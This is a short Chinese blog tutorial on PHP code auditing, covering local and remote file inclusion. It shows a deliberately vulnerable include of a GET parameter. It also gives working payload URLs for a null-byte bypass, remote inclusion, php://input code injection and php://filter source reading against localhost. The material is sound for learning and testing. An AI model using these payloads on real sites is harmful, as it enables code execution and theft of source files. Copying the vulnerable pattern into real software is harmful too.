网站建设网站首页 网站建设

php代码审计-本地包含与远程包含

发布时间：2016-12-18 15:32:21编辑：雪饮阅读（）

include:重复包含重复调用,遇到错误发生警告，但继续执行（_once时不重复调用）

require: 重复包含重复调用,遇到错误发生警告，不继续执行（_once时不重复调用）

本地包含漏洞：

<?php

$file=$_GET["file"];

//include $file;

include $file.".php";

1.txt中内容：

<?php

phpinfo();

访问：

（1）不验证后缀采用办法：http://localhost/cs.php?file=1.txt

（2）验证后缀采用办法：http://localhost/cs.php?file=1.txt%00

“（2）”测试好像没有什么效果

远程包含访问：

http://localhost/cs.php?file=http://127.0.0.1/1.txt

远程包含漏洞，需要php开启allow_url_fopen和allow_url_include为on

伪协议访问：

http://localhost/cs.php?file=php://input

安装hackbar:

使用方法：

loadurl处填写伪协议地址

钩选enable post data后出现的post data文本区域输入你的代码，相当于文件包含，而此区域就是被包含文件中的内容

注意：php版本不能过高，5.2左右

伪协议访问2（读取本地文件）：

http://localhost/cs.php?file=php://filter/read=convert.base64-encode/resource=index.php

使用说明：

去掉enable post data的钩选，填写好协议直接点击excute即可

excute为base64内容，解码后可看到正常内容

例如我们可以用burp suite professional v1.5.20这款软件进行转码

或者随便找一个在线解码工具也可以很快速的将文件内容解码：

关键字词：php代码审计